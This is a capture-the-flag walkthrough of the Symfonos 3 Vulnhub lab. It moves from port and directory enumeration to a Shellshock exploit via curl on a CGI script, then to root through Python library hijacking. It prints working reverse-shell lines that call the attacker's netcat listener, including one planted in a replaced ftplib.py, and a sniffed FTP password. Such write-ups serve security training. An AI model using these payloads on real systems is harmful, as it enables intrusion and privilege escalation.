Symfonos 3

Symfonos 3 Vulnhub Walkthrough

Enumeration

Nmap

nmap -sC -sV -oA nmap/sym3 192.168.1.114
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 02:39 EDT
Nmap scan report for 192.168.1.114
Host is up (0.00016s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5b
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:64:72:76:80:51:7b:a8:c7:fd:b2:66:fa:b6:98:0c (RSA)
|   256 74:e5:9a:5a:4c:16:90:ca:d8:f7:c7:78:e7:5a:86:81 (ECDSA)
|_  256 3c:e4:0b:b9:db:bf:01:8a:b7:9c:42:bc:cb:1e:41:6b (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:DA:E2:26 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds

Let's put the IP to the browser

And we got this at the inspect elements

So, I decided to use dirb and gobuster

dirb & gobuster 

dirb http://192.168.1.114/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue May 26 02:42:28 2020
URL_BASE: http://192.168.1.114/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.114/ ----
+ http://192.168.1.114/cgi-bin/ (CODE:403|SIZE:278)                                                                                                                                               
==> DIRECTORY: http://192.168.1.114/gate/                                                                                                                                                         
+ http://192.168.1.114/index.html (CODE:200|SIZE:241)                                                                                                                                             
+ http://192.168.1.114/server-status (CODE:403|SIZE:278)                                                                                                                                          
                                                                                                                                                                                                  
---- Entering directory: http://192.168.1.114/gate/ ----
+ http://192.168.1.114/gate/index.html (CODE:200|SIZE:202)                                                                                                                                        
                                                                                                                                                                                                  
-----------------
END_TIME: Tue May 26 02:42:38 2020
DOWNLOADED: 9224 - FOUND: 4

We got a directory called gate

Nothing seems to be interesting, so let's continue to enumerate

I can't enumerate anything from dirb so I changed to gobuster

gobuster dir -u http://192.168.1.114/gate/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.114/gate/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/26 02:44:57 Starting gobuster
===============================================================
/cerberus (Status: 301)
===============================================================
2020/05/26 02:45:39 Finished
===============================================================

We got a directory called /cerberus

Further enumeration I got /tartarus and I got this

At the inspect elements, it says it may be misleading

It seems that we might gone into a rabbit hole. So let's back to square one

I use dirbuster to enumerate the URL again

Then, when we enumerate, we got the underworld directory under cgi-bbin

Lets navigate to /cgi-bin/underworld

Got this..hmmm

After some research, found out that at the Pentesterlab, the exploit is called shellshock

Exploitation

Reverse Shell

We can get a reverse shell by using this command

curl -A "() { :; }; /bin/bash -c 'nc 192.168.1.117 443 -e /bin/sh'" http://192.168.1.118/cgi-bin/underworld

And we need to set up a listener at out machine

nc -nlvp 443

Got a reverse shell. Then we can type the python code to spawn a proper shell

python -c 'import pty; pty.spawn("/bin/bash")'

After that I use tcpdump to grab the ftp server network and store it at /tmp directory.

tcpdump -w ftplog.pcap -i lo

Then we can use nc to transfer the file to our machine to analyse it

After that we can use wireshark to analyse it.

We can filter it by tcp.port == 21 and then we right click and choose follow TCP stream and then we can see this

We got the password (PTpZTfU4vxgzvRBE) and username for user hades

We can su to the user hades

Privilege Escalation

After that we run the pspy again

Then we got this

We know that there is a file running at /opt/ftpclient that can run as root.

But when we go to the /opt/ftpclient we can see that we have no permission to edit the files.

Python Library Hijacking

After researching and asking the author of this machine cause I didn't know how it works, it is python library hijacking.

python -c 'import sys; print "\n".join(sys.path)'

Using this command will show the path that all the directories that python will look for to import the library according to the directories.

As we can see here there are bunch of folders

If we cat into the ftpclient.py that is under /opt/ftpclient, we can see that the file is importing a library called ftplib

We navigate to /usr/lib/python2.7

Then we can type ls -la | grep ftplib

We can see that ftplib.py can be modify by the user that is under group gods which can be edited by hades.

We first rename the file to become a backup file

Then we can nano ftplib.py to create a new file to replace the old one.

Type in these code to get a reverse shell 

import os
import sys
os.system("nc -e /bin/bash 192.168.1.116 4444")

Then save the file.

Go to our machine to set up a listener

nc -nlvp 4444

After waiting for 1 minute, we get a reverse shell back

Then type the python code to get a proper shell

Then, we got root !

Navigate to /root to get the flag.txt

Congratulation !

PreviousSymfonos 2NextSymfonos 4

Last updated